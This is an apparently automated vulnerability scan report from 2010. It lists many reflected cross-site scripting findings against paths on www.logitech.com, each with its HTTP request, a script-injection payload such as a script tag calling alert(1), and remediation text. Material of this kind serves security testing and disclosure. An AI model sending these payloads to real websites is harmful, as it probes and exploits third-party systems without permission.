Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /1316f</script><script>alert(1)</script>c7aa7375d53/corporate/articles/6111 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:52:26 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b5ae7"%3b5f7a4ef1239 was submitted in the REST URL parameter 1. This input was echoed as b5ae7";5f7a4ef1239 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-usb5ae7"%3b5f7a4ef1239/corporate/articles/6111 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:52:21 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a1d2f"><script>alert(1)</script>df04ba53d1f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en-us/corporatea1d2f"><script>alert(1)</script>df04ba53d1f/articles/6111 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:52:28 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 96aa7</script><script>alert(1)</script>6758b132575 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-us/corporate96aa7</script><script>alert(1)</script>6758b132575/articles/6111 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:52:33 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 54a95"><script>alert(1)</script>8d7e7aec265 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en-us/corporate/articles54a95"><script>alert(1)</script>8d7e7aec265/6111 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:52:35 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b4364</script><script>alert(1)</script>6ea853ac25c was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-us/corporate/articlesb4364</script><script>alert(1)</script>6ea853ac25c/6111 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:52:40 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c4285"><script>alert(1)</script>2a13e250375 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en-us/corporate/articles/6111c4285"><script>alert(1)</script>2a13e250375 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:52:41 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ca002</script><script>alert(1)</script>7b13caead3e was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-us/corporate/articles/6111ca002</script><script>alert(1)</script>7b13caead3e HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:52:45 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 15239</script><script>alert(1)</script>867f23a9d18 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /15239</script><script>alert(1)</script>867f23a9d18/corporate/blog HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:52:35 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dfc86"><script>alert(1)</script>098dd50b448 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en-usdfc86"><script>alert(1)</script>098dd50b448/corporate/blog HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:52:27 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 58e13</script><script>alert(1)</script>d8b4fda580f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-us/corporate58e13</script><script>alert(1)</script>d8b4fda580f/blog HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:52:44 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ae960"><script>alert(1)</script>ebb58ba7d34 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en-us/corporateae960"><script>alert(1)</script>ebb58ba7d34/blog HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:52:36 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f9f26</script><script>alert(1)</script>7b8c735237f was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-us/corporate/blogf9f26</script><script>alert(1)</script>7b8c735237f HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:52:51 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8a33e"><script>alert(1)</script>323d6418981 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en-us/corporate/blog8a33e"><script>alert(1)</script>323d6418981 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:52:45 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f32e5"><script>alert(1)</script>d893232717c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /en-usf32e5"><script>alert(1)</script>d893232717c/footer/ HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:01:24 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1b197</script><script>alert(1)</script>a64f2024785 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /1b197</script><script>alert(1)</script>a64f2024785/footer/ HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:01:31 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1e45a"><script>alert(1)</script>e2aa9e217e8 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /en-us/footer1e45a"><script>alert(1)</script>e2aa9e217e8/ HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:01:36 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f6dbc</script><script>alert(1)</script>a607fa137ac was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-us/footerf6dbc</script><script>alert(1)</script>a607fa137ac/ HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:01:42 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2da2d"><script>alert(1)</script>1977088f6ee was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en-us2da2d"><script>alert(1)</script>1977088f6ee/footer/privacy HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:52:39 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload aec25</script><script>alert(1)</script>24fa3828de4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /aec25</script><script>alert(1)</script>24fa3828de4/footer/privacy HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:52:44 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2544b</script><script>alert(1)</script>179b498f0b5 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-us/footer2544b</script><script>alert(1)</script>179b498f0b5/privacy HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:52:51 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bc3db"><script>alert(1)</script>820f2866552 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en-us/footerbc3db"><script>alert(1)</script>820f2866552/privacy HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:52:45 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1fd38"><script>alert(1)</script>0643f462487 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en-us/footer/privacy1fd38"><script>alert(1)</script>0643f462487 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:52:52 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4d6ab</script><script>alert(1)</script>7fb0cbeebd7 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-us/footer/privacy4d6ab</script><script>alert(1)</script>7fb0cbeebd7 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:52:57 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d3ac4</script><script>alert(1)</script>1ebc95eb74f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /d3ac4</script><script>alert(1)</script>1ebc95eb74f/footer/privacy/ HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:52:35 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 763a4"><script>alert(1)</script>b78dae2302b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /en-us763a4"><script>alert(1)</script>b78dae2302b/footer/privacy/ HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:52:29 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3effc</script><script>alert(1)</script>b0677628b2e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-us/footer3effc</script><script>alert(1)</script>b0677628b2e/privacy/ HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:52:50 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 60103"><script>alert(1)</script>40f7f6cc3a4 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /en-us/footer60103"><script>alert(1)</script>40f7f6cc3a4/privacy/ HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:52:38 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
